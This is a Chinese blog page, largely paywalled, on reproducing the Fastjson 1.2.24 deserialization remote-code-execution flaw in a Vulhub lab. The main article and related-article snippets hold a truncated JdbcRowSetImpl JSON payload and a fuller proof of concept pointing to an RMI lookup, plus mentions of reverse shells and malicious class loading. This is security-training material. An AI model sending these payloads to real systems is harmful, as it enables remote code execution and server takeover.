vulhub之fastjson篇-1.2.24-rce

最新推荐文章于 2025-03-25 21:07:47 发布
最新推荐文章于 2025-03-25 21:07:47 发布
阅读量697 收藏 5
点赞数 9
文章标签: 安全 网络安全 网络 linux 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_56306210/article/details/137502479
版权
本文介绍了在虚拟机环境中利用jndiexploit工具复现JNDI漏洞的过程,包括使用TouchFile类执行命令、搭建Pythonweb服务和RMI服务,以及遇到的问题如工具问题、JDK版本、网络配置和JSON格式错误。作者提供了相应的解决建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、启动环境

虚拟机:kali靶机:192.168.125.130/172.19.0.1(docker地址:172.19.0.2)

虚拟机:kali攻击机:192.168.125.130/172.19.0.1

本地MAC:172.XX.XX.XX

{
 "a":{
 "@type":"java.lang.Class",
 "val":"com.sun.rowset.JdbcRowSetImpl"
 },
 "b":{
 "@type":"com.sun.rowset.JdbcRowSetImpl",
最低0.47元/天 解锁文章
Fastjson 1.2.24反序列化漏洞(Vulhub)使用方法
R0ot
03-12 1035
Fastjson是阿里巴巴的一个开源JSON处理库,它可以实现Java对象与JSON之间的转换。然而,在Fastjson 1.2.24版本中,存在一个反序列化漏洞,攻击者可以通过构造恶意的JSON数据来触发该漏洞,进而执行任意代码,获取服务器敏感信息,甚至控制整个服务器。Vulhub是一个漏洞集成环境,方便安全研究人员进行漏洞复现和研究。本文将介绍如何使用Vulhub来搭建Fastjson 1.2.24反序列化漏洞环境,并演示漏洞的使用方法。
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 2010
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
fastjson1.2.24-RCE漏洞复现
three_1996的博客
03-15 2051
Fastjison在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链,造成远程代码执行。
Vulnhub靶场thales靶机通关攻略(一)
最新发布
2302_77611368的博客
03-25 285
4.使用msf对应模块找到密码,有对应模块。6.用msfvenom反弹shell。2.拿kali(桥接模式)扫描网段。5.登录进入后台,发现上传文件部分。点击后即可在kali监听到。22和8080端口开放。需要登录,尝试爆破密码。
fastjson反序列化漏洞(1.2.24-rce)
SuperherRo的博客
10-16 318
FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
vulhub fastjson 1.2.24 反序列化漏洞 复现
m0_64777251的博客
04-08 1110
这里要注意一点就是jdk版本要统一为1.8mvn项目要1.8而且touch.java 在用javac编译时 javac也需要是1.8如果版本不统一会导致后期反弹shell弹不上还有就是端口要打开 否则流量过不去也是扯淡。
Vulhub复现fastjson漏洞
人若有志,就不会在半坡停止。
11-08 1140
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为Java对象,Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
kali的vulhubfastjson/1.2.24-rce没有端口信息
03-24
进入对应的 Vulhub 目录(例如 `/path/to/vulhub/fastjson/1.2.24-rce`),打开 `docker-compose.yml` 文件,查找是否存在未定义的服务端口号的情况。通常情况下,FastJSON 的漏洞利用需要监听特定端口来接收恶意...
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 511
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
VulhubFastjson[漏洞复现]
如有错误感谢斧正
12-15 940
在特定条件下调用这些类的公共方法。如果一个。
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1605
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.11099 / Object”,以测试漏洞。 免责声明 所有信
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5551
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Fastjson反序列化漏洞——fastjson RCE漏洞的源头(1.2.24-rce)
m0_71263989的博客
02-20 1215
FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。近几年来fastjson漏洞层出不穷,本文将谈谈近几年来fastjson RCE漏洞的源头:17年fastjson爆出的1.2.24反序列化漏洞。以这个漏洞为基础,详细分析fastjson漏洞的一些细节问题。
vulhub漏洞复现】Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 4761
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
(一)vulhub专栏:FastJson1.2.241.2.27漏洞复现
云舒的博客
05-26 1801
入职大厂必会 写在前面的话:请注意本博客最后面的附(注意java版本),本博客采用的是LDAP服务getshell,rmi同理。阅读本博客需了解fastjson,ldap,rmi。 启动靶场 在终端里进入事先进入准备好的vulhub靶场目录下, cd fastjson/1.2.24-rce/ sudo docker-compose up -d 执行命令后,看到如下图所示即为成功,此时可在浏览器中输入http://ip:8090,正常访问即为靶场启动成功。 漏洞发现 漏洞成因 从 fastjson
vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3738
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 898
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2476
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值